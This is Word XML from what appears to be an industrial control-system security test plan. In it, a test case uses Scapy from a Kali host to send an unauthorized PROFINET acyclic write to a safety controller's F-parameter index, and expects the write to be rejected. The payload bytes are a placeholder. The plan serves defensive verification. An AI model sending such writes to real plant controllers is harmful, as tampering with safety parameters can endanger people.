            </w:r>
          </w:p>
          <w:p w14:paraId="40D7280B" w14:textId="5FAFD65C" w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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Inspect the audit log for any entry corresponding to the blocked attempt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE27EAA" w14:textId="77777777" w:rsidR="00BF7610"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(write-gate valid) if the post-phase write is rejected. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F0E1F4D" w14:textId="548EF890" w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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Documented observation: whether a blocked attempt produces an evidence entry (expected: none).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00E174AE" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRPr="006D5B99" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6445E43E" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRPr="006D5B99" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">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6D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CA639EE" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRPr="006D5B99"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F7C5E" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002F7C5E" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6450EF03" w14:textId="6E83466E" w:rsidR="002F7C5E" w:rsidRPr="006D5B99" w:rsidRDefault="002F7C5E"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TC-RQ009-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A53D6E" w:rsidRPr="006D5B99"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A53D6E" w:rsidRPr="006D5B99" w:rsidRDefault="00A53D6E" w:rsidP="00A53D6E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17BF3420" w14:textId="0DF4530C"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lang w:val="it-IT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>NV1</w:t>
            </w:r>
            <w:r w:rsidR="00DD7F6C" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>Kali (port 3), SRIO in Operate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A53D6E" w:rsidRPr="006D5B99"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A53D6E" w:rsidRPr="006D5B99" w:rsidRDefault="00A53D6E" w:rsidP="00A53D6E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ABE061F" w14:textId="7105FE29"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(recreating a PROFINET acyclic write), Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A53D6E" w:rsidRPr="006D5B99"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A53D6E" w:rsidRPr="006D5B99" w:rsidRDefault="00A53D6E" w:rsidP="00A53D6E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FA742C2"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Operate (parametrization phase completed, param-end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB8DD53"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already sent by the PLC).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750F929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Send an acyclic-write telegram to the F-parameter index (0x200,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71788C97"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SRIO-2999) using Scapy:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38B66A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cm_rq009-04_write.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4930D97E"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21496F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1AF0FDB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A4229ED"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acyclic_write_frame = bytes.fromhex("REPLACE_WITH_ACYCLIC_WRITE_RECORD_HEX")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="474F37C6"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type=0x8892)/Raw(load=acyclic_write_frame),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="451B76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98FA99A"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276A5C14"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cm_rq009-04_write.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365B2AA8"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Check the response/diagnostics; check the error log for a corresponding</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62803C21"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entry:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8FBAAB" w14:textId="77777777" w:rsidR="00A53D6E" w:rsidRPr="006D5B99" w:rsidRDefault="00A53D6E" w:rsidP="00A53D6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F635074" w14:textId="5698F63D" w:rsidR="00A53D6E" w:rsidRPr="006D5B99" w:rsidRDefault="00A53D6E" w:rsidP="00A53D6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cm_rq009-</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>04_errorlog.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A53D6E" w:rsidRPr="006D5B99"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065404EE" w:rsidR="00A53D6E" w:rsidRPr="006D5B99" w:rsidRDefault="00A53D6E" w:rsidP="00A53D6E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F95A993" w14:textId="5E4D0830" w:rsidR="00A53D6E" w:rsidRPr="006D5B99" w:rsidRDefault="00A53D6E" w:rsidP="00A53D6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Expected PAS</w:t>
            </w:r>
            <w:r w:rsidR="00DD7F6C" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>S:</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the write attempt is rejected; as expected, NO log entry is created for the rejected attempt (observation to document).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EFB048C" w14:textId="77777777" w:rsidR="000835AC" w:rsidRPr="006D5B99" w:rsidRDefault="000835AC" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB9AAB4" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRPr="006D5B99" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527EB444" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRPr="006D5B99" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A671BA6" w14:textId="77777777" w:rsidR="00D2486E" w:rsidRPr="006D5B99" w:rsidRDefault="00D2486E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29715F44" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788828AE" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4287E62C" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0083E7D2" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276BD4A4" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F141E6F" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182876AC" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1376ADD5" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F73023" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A4D0FB" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65DF3B8D" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546637FD" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5CF26E" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E467674" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8DD3C0" w14:textId="77777777" w:rsidR="00EC27C0" w:rsidRPr="006D5B99" w:rsidRDefault="00EC27C0" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43187888" w14:textId="77777777" w:rsidR="00C51580" w:rsidRPr="006D5B99" w:rsidRDefault="00C51580" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2B3F0D" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0B2FEE" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="247D179C" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8888C4" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEB4CE9" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E7E128" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7752569C" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5BE50D" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E71439" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753DC1BC" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A45DD49" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7FC778" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235DF1CD" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B76E937" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050BF12E" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70267312" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031DF73D" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B562397" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EDC165" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753C6652" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709C6C55" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB41B95" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0789AD12" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDD1421" w14:textId="77777777" w:rsidR="00DD7F6C" w:rsidRPr="006D5B99" w:rsidRDefault="00DD7F6C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0371B602" w14:textId="77777777" w:rsidR="0024007B" w:rsidRPr="006D5B99" w:rsidRDefault="0024007B" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F334E8" w14:textId="61CA64BE" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>REQUIREMENT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4173A9"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092B695C" w14:textId="2D4C3EA1" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617593F6" w14:textId="19B1CCE2" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="00DB1578" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text: The control system shall withstand reasonably foreseeable malicious attempts from third parties that could lead to a hazardous situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA1E47" w14:textId="680497B8" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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167C8E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B95E32" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CR </w:t>
      </w:r>
      <w:r w:rsidR="00491899" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5, CR 3.6, CR 3.7, </w:t>
      </w:r>
      <w:r w:rsidR="00DB1578" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 7.1 (1)</w:t>
      </w:r>
      <w:r w:rsidR="00491899" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, CR 7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2888CC" w14:textId="0E908B32" w:rsidR="00DB1578" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
